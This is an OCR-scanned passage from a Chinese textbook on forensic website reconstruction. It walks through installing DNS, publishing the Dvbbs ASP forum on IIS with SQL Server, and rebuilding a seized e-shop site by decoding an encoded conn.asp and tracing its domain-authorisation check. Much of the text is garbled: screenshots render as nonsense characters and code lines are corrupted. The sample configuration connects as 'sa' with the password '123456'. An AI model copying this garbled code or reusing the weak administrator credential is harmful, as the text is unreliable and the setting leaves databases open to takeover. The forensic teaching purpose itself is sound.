图 2-5 “身份 验证 模式 "窗口 


一 切 选 项 设 定 正确 后 ,安装 程序 开始 向 硬盘 复制 必要 的 文件 ,开始 正式 安装 。 安 装 完 
成 后 ,在 桌面 上 单 击 “开始 -程序 ”命令 ,. 即 可 看 到 Microsoft SQL Server 2000 的 程序 
组 件 。 


4. 域名 服务 器 安装 

要 想 服务 器 能 够 提供 域名 解析 服务 ,必须 在 主机 上 安装 DNS。DNS 已 经 被 作为 组 件 
集成 到 Windows 操作 系统 中 ,如 果 用 户 在 安装 操作 系统 时 选择 安装 了 DNS, 就 不 再 需要 
单独 进行 安装 ,如 果 在 安装 时 用 户 没有 选择 安装 DNS, 可 以 像 安 装 其 他 Windows 组 件 一 
样 进 行 安装 。 具 体 的 操作 步 又 如 下 : 

(1) 进入 控制 面板 ,双击 “添加 或 删除 程序 ”图 标 ,打开 “添加 /删除 程序 ”对 话 框 。 在 
左边 项 目 栏 中 ,点 击 “ 添 加 /删除 Windows 组 件 ” 按 钮 ,安装 程序 启动 后 ,打开 如 图 2-6 所 
示 的 对 话 框 。 
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Tindows 钥 件 向 导 x| 
Tindors 和 组件 eS 
可 以 添加 或 册 除 Windows 的 组 件 。 | 


SN ne 


组 件 C): 

口角 索引 服务 0.0 IB 关 
回 恒 应 用 程序 服务 器 24.4MB | 
口 加 远程 安装 服务 1.9 上 

门 亏 远 笠 存 储 35 到 
描述 : 包 合 各 种 专门 的 、 网 络 相关 的 服务 和 协议 。 

所 需 磁盘 空间 : 0.0 上 

可 用 磁盘 空间 : 9193.1 NB 


《上 一 步 @g)| 下 一 步 中 ?| 取消 大 助 | 
图 2-6 “Windows 组 件 向 导 ” 对 话 框 


(2) 在 “Windows 组 件 向 导 ” 对 话 框 的 组 件 列表 框 中 选中 “网 络 服务 " 复 选 框 ,然后 单 
击 “ 详 细 信 息 ” 按 钮 ,打开 “网 络 服务 ”对 话 框 ,在 组 件 列表 框 中 选中 “域名 系统 (DNS)" 复 
选 框 ,如 图 2-7 所 示 ,然后 单 击 “ 确 定 ” 按 钮 。 


习 
TT 
网 络 服务 的 子 组 件 C): 


口 加 Internet 验证 服务 
口 加 Windows Internet 名 称 服务 WIINS) 0.8 路 
口 转动 态 主机 配置 协议 DOMCP) 
口 加 简单 TCP/IP 服务 


描述 : 安装 DNS 服务 器 响应 对 DNS 名 称 的 查询 和 更 新 的 请 求 . 


所 需 磁 盘 空间 : 1.3 有 陋 信 
可 用 磁盘 空间 : 9193.1 上 [a 
el 


图 2-7 “网 络 服务 对话 框 


(3) 单 击 “ 下 一 步 ?按钮 ,安装 程序 开始 自动 配置 组 件 并 安装 域名 系统 ,直至 完成 DNS 


222 发 布 网 站 


运行 平台 搭建 好 之 后 ,用 户 就 可 以 在 服务 器 上 发 布 事先 做 好 的 ASP 网 站 了 ,发布 网 
站 一 般 需要 3 个 步骤 ,首先 在 IIS 上 发 布 网 页 文件 , 若 该 网 站 是 静态 网 站 , 则 只 需 这 一 步 
就 可 以 完成 了 ,否则 动态 网 站 需要 创建 后 台数 据 库 , 最 后 还 要 修改 前 台 网 站 连接 数据 库 的 
参数 。 
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【 实 训 2-1】 在 虚拟 主机 Windows 2003 Server 上 通过 IIS 发 布 “ 动 网 论坛 ”", IP 地 址 
为 192. 168. 6. 128 ,端口 为 默认 端口 80。 


1. 发 布 前 台 网 页 文件 
(1) 在 “Internet 信息 服务 (IIS) 管 理 器 对话 框 中 , 右 击 “网 站 ?项 ,在 弹出 的 快捷 菜单 
中 选择 “新 建 ”>“ 网 站 ”命令 ,如 图 2-8 所 示 。 


智 Internet 信息 服务 (ITS 和 管 
则 文件 E) 操作 (8) 查看 Er 帮助 td 
中 之 | 外 加 | 办 国史 | 国 | 旺 | 7 

Internet 信息 服务 下 
日 Me ee 例 默 认 网 站 


ee 


刷新 EE) 
导出 列表 Q). 


属性 人 ) 


图 2-8 “Internet 信息 服务 (IIS) 管 理 器 "对话 杠 
(2) 打开 “网 站 创建 向 导 ” 对 话 框 , 单 击 " 下 一 步 ” 按 钮 ,设置 网 站 描述 用 于 帮助 管理 员 
识别 站 点 ,如 图 2-9 所 示 。 


过 | 
网 站 描述 多 
网 站 描述 用 于 帮助 管理 员 识别 站 点 。 R 人 


输入 网 站 描述 。 
描述 四 ): 


ldvbbs 


< 上 一 步 @) 取消 | 


图 2-9 “网 站 描述 "页 面 


(3) 单 击 “下 一 步 ? 按 钮 ,设置 网 站 IP 地 址 及 端口 如 图 2-10 所 示 。 

(4) 单 击 “下 一 步 ?按钮 ,设置 网 站 主 目录 ,如 图 2-11 所 示 。 

(5) 单 击 “下 一 步 ?按钮 ,设置 网 站 访问 权限 如 图 2-12 所 示 。 

单 击 “ 下 一 步 ” 按 钮 ,最 后 在 弹出 的 对 话 框 中 单 击 “ 完 成 ”按钮 , 即 可 完成 网 站 的 创建 。 
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图 2-10 “IP 地 址 和 端口 设置 "页 面 


图 2-11 “网 站 主 目录 ”对 话 框 


网 站 创建 向 导 


可 可 


sl 
记 
F 


图 2-12 “网 站 访问 权限 "页面 
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(6) 增加 默认 文档 。 

为 了 便于 用 户 对 网 站 进行 访问 ,可 以 为 网 站 设置 默认 访问 文档 ,方法 如 下 : 在 所 创建 
的 dvbbs 网 站 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,将 打开 “dvbbs 属性 "对话 
框 ,如 图 2-13 所 示 。 在 该 对 话 框 中 可 以 对 网 站 标识 、 主 目录 、 默 认 文 档 等 重要 参数 进行 设 
置 。 切 换 至 “文档 ?选项 卡 , 可 以 设置 站 点 默认 文档 的 内 容 , 如 图 2-14 所 示 。 单 击 “ 添 加 ” 
按钮 ,在 弹出 的 对 话 框 中 输入 默认 文档 index. asp , 单 击 “确定 ?按钮 返回 ,选中 index. asp， 
单 击 * 上 移 ” 按 钮 将 其 移动 到 第 一 个 位 置 。 


Default. htm | 


Default. asp 
index. ht 


ndex. 
Detesit spx | 


图 2-14 “dvbbs 属性 ”对 话 框 “ 文 档 ” 选 项 卡 


mm 3 mm 
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2. 生成 后 台数 据 库 

在 客户 端 通过 浏览 器 对 “ 动 网 论坛 "网 站 页 面 进行 访问 ,由 于 缺少 后 台数 据 库 支撑 , 导 
致 页 面 不 能 正常 显示 。 对 网 站 源码 目录 文件 进行 查找 ,在 “全 新 安装 SQL” 子 目录 下 发 现 
dvbbs7. mdb、dvbbs7. sql 等 关键 数据 恢复 文件 。 具 体 生 成 和 恢复 数据 库 操作 步骤 如 下 : 

(1) 选择 “开始 ”一 “所 有 程序 ”一 Microsoft SQL Server 一 “企业 管理 器 ”命令 ,打开 
SQL Server Enterprise Manager 窗口 ,如 图 2-15 所 示 。 


[控制 台 根 目录 VEi erese: ft SQL Servers\SQL Server 扯 % 


r =I9|x| 
移 文件 外 操作) 查看 WW) 工具 CD) 窗口 @) 寺 助 人 0 |=181x| 
全 才 | 四 | 困 | 六 杂 国 图 | 国 | 洲 | 父 有 要 乌 


日 基 虽 croseft SQL Servers 一 = 一 -一 es 
日 全 saL server 组 地 加 | 加 目 | | 
Ss 外 | 人 msdb Northwind pubs tenpdb 
图 master 
轩 medel 
Bnsab 
BB Horthwind 


“Ii SQL Server Enterprise Manager 一 


图 2-15 SQL Server Enterprise Manager 窗口 


(2) 单 击 (local) (Windows NT) 树 状 结 点 , 右 击 “ 数 据 库 ” 项 ,在 弹出 的 快捷 菜单 中 选 
择 “ 新 建 数据 库 ” 命 令 。 在 打开 的 数据 库 属性 设置 窗口 中 输入 所 创建 数据 库 的 名 称 
dvbbsdb, 如 图 2-16 所 示 。 


数据 库 导 性 dvbbsdb x 


常规 ”| 数据 文件 | 事务 日 志 ] 


RE 


数据 库 
状态 : (未 知 ) 
所 有 者 : (未 知 ) 
创建 日 期 : (未 知 ) 
大 小 : (未 知 ) 
可 用 空间 : (未 知 ) 
用 户 数 : (未 知 ) 


CJ | ww | 


图 2-16 “数据 库 属性 ”对 话 框 
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(3) 单 击 数据库 ? 树 状 结 点 可 以 看 到 该 


入 


[| 国生 7 


音 


草 
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六 数据库 服务 器 的 所 有 数据 库 名 称 , 如 图 2-17 


所 示 。 其 中 ,dvbbsdb 是 用 户 新 创建 的 数据 库 ,其 余 master、model 等 6 个 数据 库 为 SQL 
Server 安装 过 程 中 默认 创建 的 系统 库 。 


im SQL Server Enterprise Banager - [控制 台 根 目录 icrosaEEe SQL SEAERSRSQISERASE SEEE 


谷 文件 @) 操作) 查看 WW 工具 CI) 窗口 电 。 帮助 o 


25x 
|=I8lxl 


妇 消 | 和 让 | 加 | 居 轿 加 辐 | 氏 | 六 


人 站 即日 甘 @ 


[加 控制 台 根 目录 
日 翻 上 ieroseft SQL Servers 
日 种 SL server 组 


日 到 aoea) Windors WM) 


日 国 数据 库 
0 Ey 


日 
划 
四 
十 nsab 
四 
是 


轩 国 轩 田 力图 图 图 图 田 


图 
国 
六 
阶 


由 加 支持 服务 


11 个 项 目 
6 
表 


视图 


[avbbseb 


-Neta Data Services 


(4) 选择 “工具 ”一 “SQL 查询 分 析 器 ”命令 


择 “ 文 件 ”>“ 打 开 ” 命 令 ， 


示 。 选 择 dvbbsdb 数据 库 ， 


图 2-17 dvbbsdb 数据 库 项 目 窗口 


选择 “查询 ”一 


生成 网 站 所 用 的 数据 库 表 结 构 及 存储 过 程 。 


查询 分 析 器 


他 ) 编辑 在 ) 查询 @) 工具 并 窗口 如 帮助 00) 


存储 过 程 


四 和 &. 


默认 值 国 用 所 广 司 全 文 目录 


执行 "命令 ,在 该 数据 库 内 运行 SQL 语 


电 最 


用 户 角色 


= 


,打开 SQL 查询 分 析 器 窗口 ,在 该 窗口 选 
人 SQL\dvbbs7. sql" 文 件 , 如 图 2-18 所 


名 , 即 可 


| 前- 区 园 加 | 双 征 高 回 攀 | 己 | 国 -|v， al[Uanstu 习 | 可 管区 | 男 国 


ET x 


目 ccPC-XP ICCPC-XPWAdr 本 


加 系统 统计 函数 
由 - 回 text 和 inage 区 
由 品行 集 


查询 
CREATE TAELE Tdbo]. TDv Adcodej 人 
[A_ID] [int] IDENTITY (1, 
[A_Address] [nvarchar] 
[A-filetype] [nvarchar] ( 


1) NOT NULL ， 


[A_rate] [nvarchar] 


(5) COLLATE Chinese_PRC_CI_AS 


CCPC-XP. dvbbsdb. CCPC-XP\Adninistrator — CVDYDDS NS 


(5) COLLATE Chinese_PRC_CI_AS NULL ， 
5) COLLATE Chinese_PRC_CI_AS NULL ， 


FLL ， 


[A_Adcode] [ntext] COLLATE Chinese_PRC_CI_AS NULL , 


[A_AddTine] [snalldatetine] NULL 
on [PRINARY] TEXTINAGE ON [PRINMARY] 


CREATE TABLE [dbo]. [Dv_Adnin] ( 


[id] [int] IDENTITY (1, 1) NOT NULL , 


[usernane] [nvarchar] (50) COLLATE Chinese_PRC_CI_AS NULL ， 
[password] [nvarchar] (50) COLLATE Chinese-PRC-CI-AS NULL ， 


[flag] [ntext] COLLATE Chinese_PRC_CI_AS NULL » 


[LastLogin] [snalldatetine] NULL , 
[LastLoginIP] [nvarchar] (50) COLLATE Chinese_PRC_CI_AS NULL , 
[adduser] [nvarchar] (50) COLLATE Chinese_PRC-CI_AS TULL 

) bn [PRINMARY] TEXTIMAGE ON [PRINMARY] 


CREATE TABLE [dbo]. [Dv_BbsLink] ( 
[id] [int] NOT NULL ， 
[boardnane] [nvarchar] 
[readme] [nvarchar] 
[url] [nvarchar] 


【50) COLLATE Chinese_PRC_CI_AS NULL , 
(255) COLLATE Chinese_PRC_CI_AS NULL , 
(150) COLLATE Chinese_PRE_CI_AS NULL , 


[logo] [nvarchar] (250) COLLATE Chinese_PRC_CI_AS NULL ， 


lislogo] [int] NULL 


图 2-18 SQL 查询 分 析 器 窗口 
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(5) 接 下 来 ,要 向 生成 的 数据 库 中 导入 网 站 系统 初始 数据 ,具体 操作 方法 如 下 : 
在 图 2-17 中 的 窗口 中 , 右 击 dvbbsdb 数据 库 , 在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”一 
“导入 数据 ”命令 ,打开 “DTS 数据 导入 /导出 向 导 ” 对 话 框 如 图 2-19 所 示 。 


各 ITS 导入 /导出 向导 
数据 转换 服务 导入 /导出 向 导 


eS 和 并 村 的 二 维 
。 当 您 在 多 种 第 用 数据 格式 ( 包括 数据 库 、 电 子 
亲生 全 和 ) 之 间 导入 数据 时 ， 该 向 导 格 指导 您 


< 上 步 久 [下 - 步 加 > 取 滑 必 助 | 
图 2-19 “DTS 数 据 导入 /导出 向 导 ” 对 话 框 


(6) 单 击 “ 下 一 步 ” 按 钮 ,打开 “选择 数据 源 ” 页 面 ,选择 数据 源 类 型 为 Microsoft 
Access, 文 件 名 为 “C:\DVBBS\ 全 新 安装 SQL\Dvbbs7. mdb”。 


学 | TS 导入 /导出 向 导 x| 


选择 数据 源 
您 要 从 何 处 复制 数据 ? 可 从 下 列 源 之 一 复制 数据 。 妈 


数据 源 [D} 本 Microsoft Access "| 


个 要 所 床 并 提供 一 个 用 户 名 和 窗 码 。 可 能 
性 项 要 指 全 高级 选项 


文件 名 [E} [CADv8BS\ 全 新 安装 SQL\Dvbbs7 mdb eal 
用 户 名 QU} 


密码 中 [| 


高 级 把) | 
《上 - 步 @ [让 mw | #w | 


图 2-20 “选择 数据 源 ” 对 话 框 


(7) 单 击 “ 下 一 步 ” 按 钮 ,打开 “选择 目的 ”页 面 ,选择 目的 数据 库 服 务 器 IP 地 址 , 若 在 


本 地 默认 为 local, 目 的 数据 库 名 称 为 dvbbsdb, 如 图 2-21 所 示 。 
(8) 单 击 “ 下 一 步 ” 按 钮 ,打开 “指定 表 复 制 或 查询 ”页 面 , 按 其 默认 选项 “从 源 数据 库 


复制 表 和 视图 ” 单 选 按 钮 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 2-22 所 示 。 
(9) 在 打开 的 “选择 源 表 和 视图 ”页 面 中 单 击 “ 全 选 ” 按 钮 ,再 单 击 “ 下 一 步 ”按钮 , 接 下 


来 均 按 默认 选项 设置 进行 ,直至 完成 表 数 据 导入 操作 ,如 图 2-23 所 示 。 
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学 | TS 导入 /导出 向 导 过 
选择 目的 
您 要 将 数据 复制 到 | 何 处 ? 可 将 数据 复制 型 | 下 列 目的 之 一 。 EE 
目的 0 


目 若 要 连接 到 Microsoft SQL Server, 必须 指定 服务 器 、 用 户 名 和 密码 。 


Rs li 可 
个 使 用 Windows 身 份 验证 [W] 
人 使 用 SQL Sever 身 份 验证 加 ) 
用 Fa 
这 到 加 EC 


数据 库 [D} [ose 习 mW) | NE | 


mm | | 


图 2-21 “选择 目的 "页面 


TS 导入 /导出 向 导 x| 
指定 表 复制 或 查询 
指定 是 从 数据 源 复制 一 个 或 多 个 表 / 视 图 ， 还 是 复制 查询 结果 。 EE 
光一 目 
Microsoft Access Microsoft SQL Server 


三 用 


凯 


人 在 50L5eryer 数 据 库 之 间 复 制 对 象 和 数据 IJ 


一 | mm | 
图 2-22 “指定 表 复 制 或 查询 ”页面 


划 
Ta 人 王国 制 。 可 在 : 据 出 现在 源 中 时 进行 妈 
和 


国 [dvbbsdb][dbo][Dv_A. 
国 dvbbsdbj[dbojIDv_bbs1] 六 | 
男 [dvbbsdbjldbojlDv_8.、 “ 剧 
国 [dvbbsdblldbojlDv_8 本 | 
国 [dtbsdbjldbolibv 6 “出 
届 fdybbsdblidboliDy B. | 


全 先 [5J | 取消 全 选 吕 ) | 预览 PP}.- 
sw | 


图 2-23 “选择 源 表 和 视图 ”页 面 
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3. 修改 网 站 数据 库 连 接 参 数 

网 站 发 布 工作 及 后 台数 据 库 创建 工作 完成 后 ,最 后 一 步 就 是 要 修改 网 站 对 后 台数 据 
库 的 连接 参数 ,常用 的 ASP 网 站 连接 数据 库 的 方式 很 多 .本文 所 采用 的 动 网 论坛 7.0 连 
接 数据 库 是 通过 配置 文件 完成 的 ,该 文件 位 于 网 站 源码 根 目 录 下 ,名称 为 CONN. ASP， 
根据 实际 情况 修改 该 文件 中 的 SqlDatabase、SqlPassword、SqlUsername、SqlLocalName 
参数 值 ,具体 内 容 如 图 2-24 所 示 。 


39 
文件 中) 编辑 于 ) 格式 @ 四 ) 查看 YY) 帮助 0) 


Else 


End IF 


Sub ConnectionDatabase < 
Dim ConnStr 
IF 90 关 提 一 1 


Then 

据 库 连 接 参数 ， 数 据 库 名 、 用 户 密码 、 用 户 名 、 连 接 名 (本 地 用 1ocal， 外 地 月 
Din 人 SqlPassword,SqlUsernane , 人 

SqlDatabaseName = “dvbbsdb” 

SqlPassword = "123456" 

SqluUsername = “Sa” 

SqlLocalNane = “(local)" 

ConnStr = “Provider = Sqloledb; User ID = ”& SqlUsername & "; Password = " 


ER 如 


Db = “data/dvbbs7 
ConnStr = “Provider = Microsoft.Jet.0LEDB.4.8;Data Source = " & Seruer .Mapl 


On Error Resume Next 

Set conn = Server.CreateQbject("“ADODB.Connection") 
conn.open ConnStr 

IF Err Then 
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图 2-24 CONN. ASP 文 件 


后 ,在 客户 端 主 机 启动 浏览 器 ,输入 网 址 http://192. 168. 6. 128, 即 可 访问 到 所 发 
布 的 动 网 论坛 主页 ,如 图 2-25 所 示 。 


稻 动 网 先 镍 论坛 -论坛 首页 - 360 安 ..。 。 大 请 登录 ”文件 人 ) 查看 (V) 收藏) 帐 P(U) 工具 IT) 帮助 t) 风口 x 
(€)3- X| 二 | 会 | 久居 下 | 起 无 病 "|| 国 htip://192.168.6.128/ | wi$ 加 漠 | >|| -第 入 文字 ， 直 提 Q | 
遍 收 总 ” 兄 网 易 业 各 歌 属 网 址 大 全 殉 游 戏 中 心 > 国 邮件 ” 固 游 戏 ”是 由 上 R ” 感 规 田 ” 国 番 译 ” 茧 应 用 例子 - 
而 国 动 办 坛 论坛 页 


让 吉 | 自 写 直 入 | 了 光志 股 | 铃声 搜索 。 | 歌曲 /歌手 |] 关 


轧 /E523 | 动 网 论坛 专业 主机 oom 


Er 论坛 展区 | 我 能 做 什么 


欢迎 你 访问 动 网 先锋 论坛 ， 修 还 没有 [注册 ] 或 [ 登录 ] 


当前 没有 公告 (2012-2-2 10:55:15) 


共有 1 位 会 员 新 进来 宾 [adain] 
i 今日 发 帖 :0 篇 主题 8 数 :0 篇 
: | [登录 : : 
的 fg 图 对 昨日 发 帖 :0 篇 帖子 名 数 :0 篇 
阳光 会 员 : [13 阳光 会 员 快速 注册 景 高 日 发 帖 : 0 篇 ， 发 生 时 间 : 2003-12-25 11:25:00 
查看 新 贴 4 热门 话题 4 发 贴 排行 + 用 户 列表 
> 友 荡 论坛 R 
动 网 先锋 司 
1 »] 
完毕 口 芭 庆 第 模式 全 余人 ID 改写 长 - 旦 名山 Qloo%- 


图 2-25 “ 动 网 先锋 论坛 "首页 
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223 发 布 加 密 网 站 


对 涉 网 站 案件 进行 检验 过 程 中 可 能 发 现 大 量 的 网 站 源码 文件 ,由 于 动态 网 页 内 容 通 
过 浏览 器 并 不 能 显示 ,所 以 为 了 发 现 更 多 的 证 据 , 通 常 需要 搭建 运行 环境 将 网 站 发 布 ,但 
是 在 现实 取证 工作 中 ,从 检 材 中 发 现 的 网 站 代码 并 不 是 使 用 实 训 2-1 的 方法 就 能 够 顺利 
地 发 布 ,如 数据 库 不 同 就 会 导致 后 台数 据 库 的 构建 方法 不 同 ,文件 代码 不 完整 等 。 为 了 安 
全 起 见 ,一 部 分 网 站 的 后 台数 据 库 连接 参数 是 加 密 的 ,就 需要 在 发 布 网 站 时 根据 错误 提示 
信息 结合 源 代码 分 析 将 网 站 发 布 出 来 

【 实 训 2-2】 在 虚拟 主机 Windows 2003 Server 上 通过 IIS 发 布 本 机 下 盘 下 
webshopl5ydkj 文件 夹 中 的 内 容 ,IP 地 址 为 192. 168. 253. 128 ,端口 为 默认 端口 80。 

解析 : 打开 浏览 本 地 计算 机 下 盘 下 webshop15ydkj 文件 夹 目录 结构 ,从 中 发 现 大 量 
的 asp 文件 ,在 Data_Shop363 子 目录 下 发 现 相 关 数 据 库 文件 如 图 2-26 所 示 。 这 些 文件 
扩展 名 为 mdb ,为 Access 数据 库 文 件 。 在 webshopl5ydkj 目录 内 发 现 conn. asp 文件 ,该 
文件 通常 为 数据 库 连 接 参数 所 在 文件 ,该 文件 内 容 如 图 2-27 所 示 ,为 加 密 后 文件 ,也 就 是 
说 暂 不 能 断定 该 网 站 的 后 台数 据 库 是 哪 一 


360 KB Microsoft Office Access :应 用 程序 


图 2-26 Data_Shop363 子 目 录 下 内 容 


文件 (F) ”编辑 (E) 格式 (0) 查看 (V) 帮助 (H) 

<%@ LANGUAGE = UBScript.Encode CODEPAGE="936"%> 

<+--#include file="Inc/Data.asp"--> 

<%HE “SAMAAA==9b :~ ;YW x*?DD@NGEBKx~+ HDG . ,D+k; :NPxNa0@HeedU+OP“G xx?0.\ED /M+10n》4% 
+*+10uJ)GrGARSYW UriYry Jb7Glatd&WP&/F(KC/K SPOtnUGNiG&R7ZKUxkY .xrnDG-bNnD{ \bm.K/KOYC9RORY 
S3F~R* Zi9NOP}YS2G$1FmYm4C/n “hld/SGD9 EUry$r 1.XhCk/crRJJHL Jp91DI~?KE. “0 JLd+M\+M 
hlawmy4 jaKwfu2nf (HGei2UdnGHGeE7ZKU ?0M'rnDKNb[+M"Nk1DGdKBYcB+DRrd39hcccy 

IFCOmPjwy .mg "Ek*D-nMRhla2mY hvu? hw2u2nF (teeei2U[ ,qbalatatatdB;GUxUYMPxPEKMW-k9nD 

{Hr “MW/GWDRB+D }S3GACCRZiGCYmPjW?D Nn{J[ ,d+M\+M hlawnyh jaKwFu2nfF (Hrign0,rJ2G$=FCD1 
(1/0PhC/khGD9 EUkYt[ 4h1/k "EJ ,QHeEduB/G xijYMxJhDG-bN+ .xtk“DKdKO0c9NYR}SA9AcC tpfCOmP? 
KsD1+'r"d*+M\aD :C2al0tujtKwfE2{fSbBtG&7ZKU R6a+ PZKx jyMate&d&e~3MDP :4+ 


attati73DMR;Unl .Gagtd7?80P;WUU, PHGDtrxTBGka&d7…+kwW 7 MMkO* ,上 城 据 库 壬 接 错 误 zEavesdi] 
+kwW dnRAx9@Ged3U9P( GHGET /WW/n/KxU ~, Pp™ ,QBEkO, kkGAN+ “YuZGU jpDu+ Qi 
R;UG/n@HeePj+D~ZKxUxgWY hr 0@HGEAUIPr 6GHGE2x9PU ;4 ,MEdFUAAA== "HY> 

《1--#Hinclude File="Inc/Conn.asp"-—> 


<%IF SitIs0pen="B” Then Response.write "<table width="188%"><tr><td align='center" 
height="*288" style="'color:red;font-size:18px;'>"&SitCloseCon&"</td> /tr> /table>™ : 
Response .end%> 


图 2-27 conn. asp 文件 内 容 


1. 发 布 前 台 网 页 
采取 IIS 下 发 布 ASP 的 典型 方法 将 该 目录 进行 发 布 。 将 本 机 下 盘 下 webshop15ydkj 
文件 夹 内 容 上 传 至 Windows 2003 Server 虚拟 机 中 ,在 IIS 中 发 布 该 文件 夹 内 容 , 具 体操 
作 步 又 见 2. 2. 2 节 , 默 认 文档 设 为 webshop15ydkj 文件 夹 下 的 index. asp 文件 。 在 本 机 
浏览 所 发 布 网 站 ,显示 内 容 如 图 2-28 所 示 。 
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[DD 192. 168. 253. 128 


《ULGI 灾 回 


对 不 起 ， 该 网 站 程序 只 允许 在 本 机 及 域名 ( www. 15ydkj. com 15ydkj. com ) 下 授权 使 用 ! 


图 2-28 ” ”webshopl5ydkj 网 站 主页 


2 代码 解析 

从 图 2-28 中 可 以 看 到 “对 不 起 ,该 网 站 程序 只 允许 在 本 机 及 域名 (www. 15ydkj. com 
15ydkj. com) 下 授权 使 用 !” 的 提示 信息 ,也 就 是 说 网 站 进行 了 授权 访问 设置 ,要 想 看 到 网 
站 内 容 , 必 须要 找到 进行 授权 访问 设置 的 代码 段 ,屏蔽 相关 代码 段 。 具 体操 作 可 以 将 “对 
不 起 ,该 网 站 程序 只 允许 在 本 机 及 域名 (www. 15ydkj. com 15ydkj. com) 下 授权 使 用 !” 作 
为 关键 词 ,在 源码 文件 中 进行 搜索 ,找到 相关 代码 段 。 

(1)“index. asp” 文 件 解析 。 

由 于 “对 不 起 ,该 网 站 程序 只 允许 在 本 机 及 域名 (www. 15ydkj. com 15ydkj. com) 下 
授权 使 用 !? 提 示 信 息 是 访问 index. asp 页 面 显示 的 ,下 面 就 以 该 页 面 为 切入 点 进行 解析 。 
找到 该 文件 ,在 文件 内 进行 搜索 后 ,没有 发 现 “ 对 不 起 ,该 网 站 程序 只 允许 在 本 机 及 域名 
(www. 15ydkj. com 15ydkj. com) 下 授权 使 用 !1” 关 键 词 ,但 是 在 "index. asp” 文 件 中 发 现 了 
以 下 几 条 脚本 代码 : 


< I-—# include file= “Conn asp 一 -> 
< I-—# include file= “Top.asp 一 -> 
< I-—# include file= Foot.asp 一 -> 


以 上 为 三 条 include 指令 ,include 指令 的 含义 是 表明 服务 器 执行 在 ASP 文件 之 前 ， 
把 另 一 个 ASP 文件 插入 这 个 文件 中 。 也 就 是 说 访问 index. asp 所 看 到 的 内 容 , 不 仅 是 
index. asp 文件 内 代码 被 执行 的 结果 ,也 包括 Conn. asp、Top. asp、Foot. asp 这 三 个 文件 
代码 ,那么 接 下 来 就 可 以 在 这 三 个 文件 中 分 别 查找 关键 词 信息 。 

(2) conn. asp 文件 解析 。 

conn. asp 文件 内 容 如 图 2-27 所 示 , 内 容 被 加 密 , 由 于 ASP 默认 的 脚本 语言 为 
VBScript, 可 使 用 相关 VBSscript 解密 工具 对 其 进行 解密 ,结果 如 图 2-29 所 示 。 

对 解密 后 内 容 进 行 分 析 , 也 未 找到 “对 不 起 ,该 网 站 程序 只 允许 在 本 机 及 域名 (www. 
15ydkj. com 15ydkj. com) 下 授权 使 用 !” 关 键 词 ,但 是 发 现 该 文件 使 用 了 两 条 include 指令 

< I-—# include file= “Inc/Data. asp' 一 -> 

< I-—# include file= “Inc/Comm asp 一 -> 

(3) Inc/Data. asp 文件 解析 。 

Inc/Data. asp 文件 内 容 如 图 2-30 所 示 ,其 中 没有 “对 不 起 ,该 网 站 程序 只 允许 在 本 机 
及 域名 (www. 15ydkj. com 15ydkj. com) 下 授权 使 用 ! ”关键 信息 ,但 是 可 以 看 到 该 网 站 后 
台数 据 的 相关 信息 : 数据 库 文件 扩展 名 为 mdb 说 明 该 网 站 的 后 台数 据 为 ACCESS 类 型 
数据 库 ,数据 库 文件 为 Data_Shop363/# Date_Shop363_shop. mdb。 
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VBscript. Encode 解 密 


We LANGUAGE = VBScript CODEPAGE="936"%> 四 
<!—#include file="Inc/Data. asp”—> 
WDim ConnStr 
”on error resume next 
Set conn=Server. CreateObject (“ADODB. Conmnection”) 
S=] then 
vider=Nicrosoft. Jet. OLEDB. 4. 0; Jet OLEDB:Database Password=- “8GetBinaryPass 3 
&server. mappath(Shop363_Db) 


(./ ;Data Source= 
Else 
ComnStr="Provider=]licrosoft. Jet. OLEDB. 4. 0;Data Source="&server. mappath(Shop363_Db) 
End If 


“ConmnStr = “Provider-licrosoft. Jet. OLEDB. 4. 0;Data Source="& server. mappath(Shop363_Db) 
:Jet OLEDB:Database Paseword= “8SitHdbPass8 
“ConnStr=“Provider=Jicrosoft. Jet. OLEDB. 4. 0;Data Source=“&server. mappath(Shop363_Db) 
Conn. Open ConnStr 
If Err Then 
Err.Clear 
Set Conn = Nothing I 
Response. Write “总 据 库 连接 错误 1 


解密 


图 2-29 conn. asp 文件 解密 结果 


K% 
Dim CacheName 

Response-Buffer = True 

Response -Expireshbsolute = Now - 1 
Response -Expires = 8 

Response .Charset="gb2312” 

Seruer .ScriptTimeout=69 
Session.CodePage=936 

Dim IsDbPass 
CacheName="syc_py_cava%$#egg" 
Const SitWebCookies="Shop363_Yxf" 
IsDbPass= 


“以 下 pa 内 为 数据 库 名 称 及 目录 可 在 此 更 改 


Const Shop363_Db='"Data_Shop363y#Date_Shop363_shop -mdb” 
%> 


图 2-30 ”Inc/Data. asp 文件 内 容 


只 要 主机 内 安装 了 Access 数据 库 软件 ,在 webshopl5ydkj 主 目录 中 的 Data_Shop363 子 
目录 内 双击 # Date_Shop363_shop. mdb 文件 就 可 以 打开 数据 库 ,如 图 2-31 所 示 。 


状 azpate_Shop363_shop : 数据 库 (Access 2000 文件 格式 ) 加 回国 


转 ”使 用 向 导 旬 建 表 
团 通过 输入 数据 他 建 表 

四 NotDownLoad 2010-8-3 10:16:29 ”2010-8-3 10:16:28 表 
加 Shop363_KuaiDi 2011-1-25 12:49:30 2011-1-25 12:49:30 表 
国 shop383_Proclass 。 产品 类 别 2011-9-20 16:00:18 2011-9-20 16:00:17 表 
四 表 
国 表 


Shop363_Products ”商品 列表 2011-9-20 16:01:21 2011-9-20 16:00:17 
Shop363_WebInfo 2011-7-5 20:36:44 。 2009-4-16 21:42:21 


图 2-31 Date_Shop363_shop. mdb 数据 库 
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其 中 ,该 数据 库 内 有 Shop363_KuaiDi、Shop363_ProClass、Shop363_Products 等 数据 
表 , 双 击 可 任意 打开 数据 表 查 看 内 容 , 如 图 2-32 所 示 。 


画 Shop363_KuaiDi : 表 


KdOrder AddTime Drdernun | 0therl | Other2 ~ 
120110111000012 ，2011-1-11 22:50:32 
432143214321 2011-1-11 22:51:00 
432143214321 2011-1-11 22:51:14 
432143214321 2011-1-11 22:51:26 
120110111000012 ，2011-1-11 22:50:32 
432143214321 2011-1-11 22:51:00 
7 王 二 麻 432143214321 2011-1-11 22:51:14 
8 李白 432143214321 2011-1-11 22:51:26 
9 张 $ _ || 120110111000012 | 2011-1-11 22:50:32 
10 李 四 432143214321 2011-1-11 22:51:00 
11 壬 二 麻 432143214321 2011-1-11 22:51:14 
12 李白 432143214321 2011-1-11 22:51:26 
13 张 & 三 | 120110111000012 | 2011-1-11 22:50:32 
